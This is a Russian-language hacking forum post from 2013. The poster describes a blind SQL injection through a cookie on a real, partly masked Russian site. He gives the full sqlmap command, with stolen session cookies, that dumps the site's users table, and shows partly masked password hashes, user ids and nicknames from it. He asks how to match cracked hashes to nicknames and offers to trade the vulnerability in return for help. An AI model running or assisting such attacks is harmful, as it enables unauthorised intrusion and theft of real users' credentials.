Показать сообщение отдельно
Старый 03.06.2013, 23:39   #2881
NeuroZnanie
 
Регистрация: 10.07.2012
Сообщений: 7
Репутация: 4
По умолчанию

Доброго времени суток, господа. У меня вопрос. Блайнд в куках. Запрос sqlmap


python ./sqlmap.py --url="http://www.*e***l*.ru/script.php" --threads=5 --level=5 -b --cookie="__utma=11681585.1163264804.1367220649.1369 901808.1369911331.12; __utmz=11681585.1367220649.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); lasttime1=1370187087; nick=c**o; userid=33**97; password=9a340ff40b7***455b4c17da066ac00a; per1000=1.3; lasttime=1370176976; ocode=375***4; email=so***.bro%40gmail.com" --random-agent --dbms="MySQL" -p userid --charset="UTF 8" --dump -D loveumru_*e****l -T users -C password --start=10 --stop=11

Нужны колонки password, nick, id. Вывожу постепенно сначала password потом id и nick. На выводе

Table: users
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 00018c5ea874****77fd119da95b5d2 |
| 00018f2d0ec71d5****2dcf8cb20b8 |
+----------------------------------+
+------+
| id |
+------+
| 1343 |
| 1344 |
+------+

+--------------+
| nick |
+--------------+
| D**Sh* |
| i**he**ov49 |
+--------------+

Но записи не совпадают. Хеш расшифровывается но пароль первого хеша не подходит первому нику. Как сделать совместимый вывод? Поделюсь уязвимостью с тем кто поможет.Один из крупнейших сайтов уникального контента.
NeuroZnanie вне форума   Ответить с цитированием